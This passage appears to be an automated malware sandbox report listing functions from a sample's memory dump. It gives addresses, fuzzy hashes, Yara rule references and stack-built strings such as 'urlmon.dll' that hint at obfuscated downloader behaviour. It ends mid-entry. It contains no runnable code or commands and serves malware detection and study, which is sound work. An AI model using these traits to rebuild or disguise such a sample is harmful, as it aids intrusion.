                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: /Q$N
                                                • API String ID: 0-3608907964
                                                • Opcode ID: be73012014481851536c10c0ffb6e85dbb5824d3737c7499075e8ffc515ae32e
                                                • Instruction ID: da81256117b86eefe69e50018fbc1b0d03124aea2cb365f75968833ae3466c63
                                                • Opcode Fuzzy Hash: be73012014481851536c10c0ffb6e85dbb5824d3737c7499075e8ffc515ae32e
                                                • Instruction Fuzzy Hash: F011EFB2D01218AF9B40DFEDDD419EEBBF9FF48214F04466AE919E7200E7705A148BA0
                                                Function 04C698AA Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8074f2e27920bd0cf3fafd64fad9a03c7409f0f050b72c356126a90fd1c18e4a
                                                • Instruction ID: 06699a9c8b760183b3d48e94fb5a5e27d3fb14bed3e6a884f22ada7dd08bc34e
                                                • Opcode Fuzzy Hash: 8074f2e27920bd0cf3fafd64fad9a03c7409f0f050b72c356126a90fd1c18e4a
                                                • Instruction Fuzzy Hash: 8531C2B5A01609AFDB14DF99D881EEFB7B9EF8C314F108219F919A3340D631A951CBA4
                                                Function 04C69A0A Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b531bfb61494bbf9a2fd35655204e535f15b6e727945870e8e85f63d589da3be
                                                • Instruction ID: 7864ea72a03d1670ef39ad9d654c2e2f0df430cf459da45f3d65f94b4704befb
                                                • Opcode Fuzzy Hash: b531bfb61494bbf9a2fd35655204e535f15b6e727945870e8e85f63d589da3be
                                                • Instruction Fuzzy Hash: 0631E6B5A00608AFDB14DF99D881EEEB7F9EF8C314F108519FD19A7340D671A951CBA0
                                                Function 04C6932A Relevance: .1, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bbd5a5dedd4004867cce0470accf931d419b0a48a6b6c36f14e2dc71ce34ac3d
                                                • Instruction ID: c83d4aa830d1a077e1d676dddbe78d6a2ea8fdf069e234f56f28bf224de73178
                                                • Opcode Fuzzy Hash: bbd5a5dedd4004867cce0470accf931d419b0a48a6b6c36f14e2dc71ce34ac3d
                                                • Instruction Fuzzy Hash: 222119B1A04608ABDB14DF58DC81EEF77FAEF89314F108219FD19A7240D631B911CBA5
                                                Function 04C69C1A Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d04dda6b5d73067fae779bf8379ae069b43f3ae1e3cd3964d91ae766aceb0f98
                                                • Instruction ID: d441c44c96c1bdcf6d33620e212b6f8b2c2058787a7d309e0f883ee6bfdca1c6
                                                • Opcode Fuzzy Hash: d04dda6b5d73067fae779bf8379ae069b43f3ae1e3cd3964d91ae766aceb0f98
                                                • Instruction Fuzzy Hash: C9213AB1A00608ABDB10DF58DC81EAB77A9EF98710F108509FD19A7240E671B911CBA1
                                                Function 04C62532 Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7df0e988de580c0268e5d6585a131a2dad86a31997a9c05254b17438f1c0eca
                                                • Instruction ID: cc31d4dc972f697ae3a69b723f2c74c8cf182a3e9dc3c990ed1abda4e472ebc3
                                                • Opcode Fuzzy Hash: a7df0e988de580c0268e5d6585a131a2dad86a31997a9c05254b17438f1c0eca
                                                • Instruction Fuzzy Hash: EE012672E001146BF724B6ACACD0AB9B3AFDBC6528F0483D7EC09D7100E1226D116692
                                                Function 04C6609D Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b4f9c3c8ec63b3933692c015232ffb9838f81030fa65425e6cdd065f7b4f23d
                                                • Instruction ID: c0e2b49e31b4e9cf76c81ed97789d62fd1432d0657cab1a5a6002699b302e9c0
                                                • Opcode Fuzzy Hash: 9b4f9c3c8ec63b3933692c015232ffb9838f81030fa65425e6cdd065f7b4f23d
                                                • Instruction Fuzzy Hash: CE114FB2D01219AF9B00DFA8C9409EFB7F9FF48200F14826AF915F7240E7706A118BA1
                                                Function 04C660AA Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 068d7f7ce48c513251d4871e846970417b4855cb31990188452bb661a71bc524
                                                • Instruction ID: 5e20ccd51d5742ad0406da5aba280367d4d899b108cb882c4c4918b72071dac8
                                                • Opcode Fuzzy Hash: 068d7f7ce48c513251d4871e846970417b4855cb31990188452bb661a71bc524
                                                • Instruction Fuzzy Hash: C71121B6D01219AF9B00DFA9D8409EFB7F9FF88210F14426AF919F7200E7705A148BA1
                                                Function 04C6914A Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1d20a401028ad1edda62a238d13a8d94daf1e23f09983612bbdc2f8d78ba76d
                                                • Instruction ID: 6ca8e4fb2997631ccf1eac73637c57267c3f441066e96797ea7e6aaf5637b4cc
                                                • Opcode Fuzzy Hash: d1d20a401028ad1edda62a238d13a8d94daf1e23f09983612bbdc2f8d78ba76d
                                                • Instruction Fuzzy Hash: AD11C171A416147BD710EB68CC81FAB77AEEFC5215F00850AFD19A7280D6717A11DBA1
                                                Function 04C6654A Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e19db3ecf29d2826b614af5b8e3d3ad58e8840e81647061fd46cd2018c81d89
                                                • Instruction ID: 5ccde28377bcfcaa5877de6ad106aa40fa56863474a872e55f0fff4988d6fcc2
                                                • Opcode Fuzzy Hash: 1e19db3ecf29d2826b614af5b8e3d3ad58e8840e81647061fd46cd2018c81d89
                                                • Instruction Fuzzy Hash: 3911F1B6D0121DAF9B00DFA9D9419EFB7FDFF88310F14426AE919E3200E7705A158BA1
                                                Function 04C68FEA Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a9c9bb720b14097688a8b684afc23d9924f4468b8d474582febd8a78e520c5e
                                                • Instruction ID: 3a7414d8ba788561664f0e51813dc2eb345d81df430460d884367fabb22d910b
                                                • Opcode Fuzzy Hash: 6a9c9bb720b14097688a8b684afc23d9924f4468b8d474582febd8a78e520c5e
                                                • Instruction Fuzzy Hash: 0911A071A41704BBE710EF68DC81FAB77ADEFC9205F00844AFE19A7240E77179118BA1
                                                Function 04C672DA Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a08ed17607b17f6ade4780a4922fb58ddc55834f12670c5e2d9dcca122ce686
                                                • Instruction ID: 86293cbda9218025ce8b9f8dd039c9ed125e8b1839ea78cf28d6d908cfd4450a
                                                • Opcode Fuzzy Hash: 4a08ed17607b17f6ade4780a4922fb58ddc55834f12670c5e2d9dcca122ce686
                                                • Instruction Fuzzy Hash: 551100B6D0121DAF9B40DFA9DD409EEBBF9FF48210F04466AE919E3200E7705A458BE1
                                                Function 04C629CA Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c2627c22026f27fd846417fb29d92c1c2bfca3de578fcf00817eb1724229391
                                                • Instruction ID: b4166867d6046c55093b76c30ce67818185f122d34665a58d5bb310789ea72b8
                                                • Opcode Fuzzy Hash: 1c2627c22026f27fd846417fb29d92c1c2bfca3de578fcf00817eb1724229391
                                                • Instruction Fuzzy Hash: 330196B6A012243BE714AA54DC85DEF736EDF85224F008355FD19D7281FA707E514AE1
                                                Function 04C672D5 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7a3e95fbcf1b7149dc3d612d8c01f9953a489eb9017bc7163deb24badec286b
                                                • Instruction ID: 12ae4fb65b1b1f6ccfa1c0a3825af5a9ac68876f9c8f25ed43c0a2942c0474ad
                                                • Opcode Fuzzy Hash: d7a3e95fbcf1b7149dc3d612d8c01f9953a489eb9017bc7163deb24badec286b
                                                • Instruction Fuzzy Hash: 36110DB6D0121DAFDB40DFA8D9409EEBBF9BF48210F04456AE915E3200E7709A458BA1
                                                Function 04C69F64 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c9114cfa059c5615d4128bbfe309fa8da3e98598c6c59cd53412ce851c90a28
                                                • Instruction ID: 737100a6ed88515d69f100d4a809d2c11d7b5e7b0d8e72bcc514aa65e5f11468
                                                • Opcode Fuzzy Hash: 5c9114cfa059c5615d4128bbfe309fa8da3e98598c6c59cd53412ce851c90a28
                                                • Instruction Fuzzy Hash: 8401C4B6204548BFDB54DF98DC91EEB77A9AFDC714F118508FA1DA3240D630F8528BA4
                                                Function 04C69F6A Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be7c36bdbf1f20ae716ea792d5979c4acb1fb8588dee8e1adf4ce2bf3a8e2feb
                                                • Instruction ID: 551f19ee49ecc8449b6641bef8477bd4e0fdc2787f02b3e5b2baac9a7dbe54b6
                                                • Opcode Fuzzy Hash: be7c36bdbf1f20ae716ea792d5979c4acb1fb8588dee8e1adf4ce2bf3a8e2feb
                                                • Instruction Fuzzy Hash: F001C4B2204608BBDB04DE89DC80EDB77ADEFCC714F018108FA0DA3240D630F8518BA4
                                                Function 04C6601A Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 515c776e1dc79ea16b4412c5aaca89e322c6a63cec17e12351b0d1eb26eb32a8
                                                • Instruction ID: 5d88d7eff5c864a82b9d673975dd4321af8158e0d31bef71701ea6d4153996d5
                                                • Opcode Fuzzy Hash: 515c776e1dc79ea16b4412c5aaca89e322c6a63cec17e12351b0d1eb26eb32a8
                                                • Instruction Fuzzy Hash: F201DEB6C01219AF9B44DFE8D9419EEBBF9AB48300F14466AE919F3200F77156048BA1
                                                Function 04C69233 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62f15781705dd51f423250473ab0881609127ec88f8b37f1e4589292fef1e370
                                                • Instruction ID: b29ba417ea6b4942b3cf381a88bedb161c2503252b24dfe95d5c7e4af25ba6d7
                                                • Opcode Fuzzy Hash: 62f15781705dd51f423250473ab0881609127ec88f8b37f1e4589292fef1e370
                                                • Instruction Fuzzy Hash: 54F062712106087BDB40DF98DC81EEB77ADEFC9A50F008459FA0D97141D671B9128BA0
                                                Function 04C6255B Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b939e551655fbe77d536efa8fc43ec183329f07672edef1273752007821af45
                                                • Instruction ID: 6d59c7750ed8ba6431b16eb9ada682e728c3e256139300f07c546aed37c9914d
                                                • Opcode Fuzzy Hash: 0b939e551655fbe77d536efa8fc43ec183329f07672edef1273752007821af45
                                                • Instruction Fuzzy Hash: A3F090B1B401007FF724EA54CCC2F7A336FDBC9A14F108658F904DA184E270B9005762
                                                Function 04C6923A Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09bb585e1f51c65ef2a8652d1e0fe5d74523fcf1efc561d203df5f3172b79283
                                                • Instruction ID: e95ba77721493417e952160ed966fb187af778cd79cb65ad343bea1f56403faa
                                                • Opcode Fuzzy Hash: 09bb585e1f51c65ef2a8652d1e0fe5d74523fcf1efc561d203df5f3172b79283
                                                • Instruction Fuzzy Hash: B8F08CB5200608BBDB00DF88CC81EAB77ADEFC8710F008009FA09A7200D671B9128BB0
                                                Function 04C62CB0 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe9e8b13f419b929cfa1a0d84b2dd72bda910a95a70ac7b67720b067ab57b5b7
                                                • Instruction ID: aad1d8514016d7c1e4b3a953679f4eb1308c596d1c40aea100cf739ef210d050
                                                • Opcode Fuzzy Hash: fe9e8b13f419b929cfa1a0d84b2dd72bda910a95a70ac7b67720b067ab57b5b7
                                                • Instruction Fuzzy Hash: ACE0207751110417C30586D4ACA14FF772DE5E9125B548DDFE51687103F431674982D9
                                                Function 04C69E8A Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd1c77017d0f9cc74d20431fb15aa8593b073b3cf3c8082461f95b01ee26dcac
                                                • Instruction ID: 6396ec992de63e5c5ffcf638166e5a824887309e8472f63629bf24e370755652
                                                • Opcode Fuzzy Hash: cd1c77017d0f9cc74d20431fb15aa8593b073b3cf3c8082461f95b01ee26dcac
                                                • Instruction Fuzzy Hash: 0FE092B2200304BBD610EF59EC41FDB37ADEFC9710F008059F909A7241DA71B9118BB4
                                                Function 04C69B7D Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5515c8fdfada6ceb469c0eaa9443935e962377dd0678cb398a7b83b40e47d16
                                                • Instruction ID: e91ec512cd3f39b4177afaf2c08c1d5347538a17eb72ad009d4a21a6c53c990d
                                                • Opcode Fuzzy Hash: d5515c8fdfada6ceb469c0eaa9443935e962377dd0678cb398a7b83b40e47d16
                                                • Instruction Fuzzy Hash: 75E09272640A047EE620AB59CC80E97779EEFD535AF505416F60DA6241D3317A158B60
                                                Function 04C6BB4A Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b62d5591734510426025fb567cf0cdfaeaa01135c265131cbe4932f534ae4fa
                                                • Instruction ID: 25f83e7cfa817bca737cd83fa26763be1e6b962c98670f3e29ced9dfaa7df042
                                                • Opcode Fuzzy Hash: 5b62d5591734510426025fb567cf0cdfaeaa01135c265131cbe4932f534ae4fa
                                                • Instruction Fuzzy Hash: BFE0867664122437D22056899C45FA7775ECBC1EB0F098564FE0DDB344F670BE0186E4
                                                Function 04C69B8A Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4f7eccd31c7649c18a88f39461552167c7b34712879f25e60725fb568e79d57
                                                • Instruction ID: 46b4dd250ed3657ecad207df342f05b32d14d152786565e6dcbfee3a72ca0756
                                                • Opcode Fuzzy Hash: e4f7eccd31c7649c18a88f39461552167c7b34712879f25e60725fb568e79d57
                                                • Instruction Fuzzy Hash: 87E08C322407047BD620EA59CC41F9BB7ADEFC575AF008016FA0DA7241D672BA169BB0

                                                Non-executed Functions

                                                Function 04C6366A Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-1002149817
                                                • Opcode ID: ee3640a867f0dbdd100c4c9f0395c6f35ca0ce7715778721c3bb5cf52ca37833
                                                • Instruction ID: 12b2271dbe2c3ac65ee60d40f35003c486eaa1d6080927026ae51370aecd6f93
                                                • Opcode Fuzzy Hash: ee3640a867f0dbdd100c4c9f0395c6f35ca0ce7715778721c3bb5cf52ca37833
                                                • Instruction Fuzzy Hash: 02C142B1D002689EDB20DFA4CC44BEEBBB9AF45304F0081D9E54DAB241E7B55B88DF95
                                                Function 04C6365F Relevance: 31.4, Strings: 25, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$5$>$B$E$F$F$H$J$Q$T$g$h$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-881177885
                                                • Opcode ID: ee904c68d7b5270f254012b6a3f5880740e588209a6f949d20b04d2b69bed586
                                                • Instruction ID: f89bdba61cff3642d4367159bf689ae3fa651695981b4c08f1a018a178dff39a
                                                • Opcode Fuzzy Hash: ee904c68d7b5270f254012b6a3f5880740e588209a6f949d20b04d2b69bed586
                                                • Instruction Fuzzy Hash: 8D61E4B0C0136CDEEB60DFA5C9447DEBAB5BB05348F10819AD54CBB251E7BA0A88DF51
                                                Function 04C60B4A Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • API String ID: 0-3236418099
                                                • Opcode ID: b18e32d9d060234f0a38c152a3046ed39d737d0dbbeb96c577cf9192788ba9f3
                                                • Instruction ID: 85b0d4e1b6dd6d59aa9f7908623bc71dc6ee24d04a36020fcf830d3f4d15c4b8
                                                • Opcode Fuzzy Hash: b18e32d9d060234f0a38c152a3046ed39d737d0dbbeb96c577cf9192788ba9f3
                                                • Instruction Fuzzy Hash: 919152B1900228AAEB20DF95CC84FEE77BEFF45704F0085A9E509A6140EB756F85CF61
                                                Function 04C60B3B Relevance: 25.1, Strings: 20, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • API String ID: 0-3236418099
                                                • Opcode ID: 2178631da5fc8e0a8a89d7700d4c4b634ee53257f18bca5dfd2dbdb3406ddbee
                                                • Instruction ID: 79adf1de02c7f36378480e2c28d365a86ecb36458831ba9b1af2d77910cf0912
                                                • Opcode Fuzzy Hash: 2178631da5fc8e0a8a89d7700d4c4b634ee53257f18bca5dfd2dbdb3406ddbee
                                                • Instruction Fuzzy Hash: F0412EB0D0032C9EEB60DFA58884BEEBBB9FF05748F104199D50DAA241E7B55B88CF55
                                                Function 04C60FEA Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: 47ee5f6ff09a467927290e7322133e4de622052b3b62449f4dd45adf142550f8
                                                • Instruction ID: 84efbd3bba468549c45a95a95c21586e69ecf82714c42119d9432bfd52d2bd94
                                                • Opcode Fuzzy Hash: 47ee5f6ff09a467927290e7322133e4de622052b3b62449f4dd45adf142550f8
                                                • Instruction Fuzzy Hash: 71D10CB2900315AFEB14DFA4CC81FEEB3BAAF48314F14851DE51AE7140EB74B9458B64
                                                Function 04C60FDD Relevance: 12.7, Strings: 10, Instructions: 213COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: 5ac955e9ed3b95e16f9d1ec7d9385f18547964398ae655a1f4f463f3bae88422
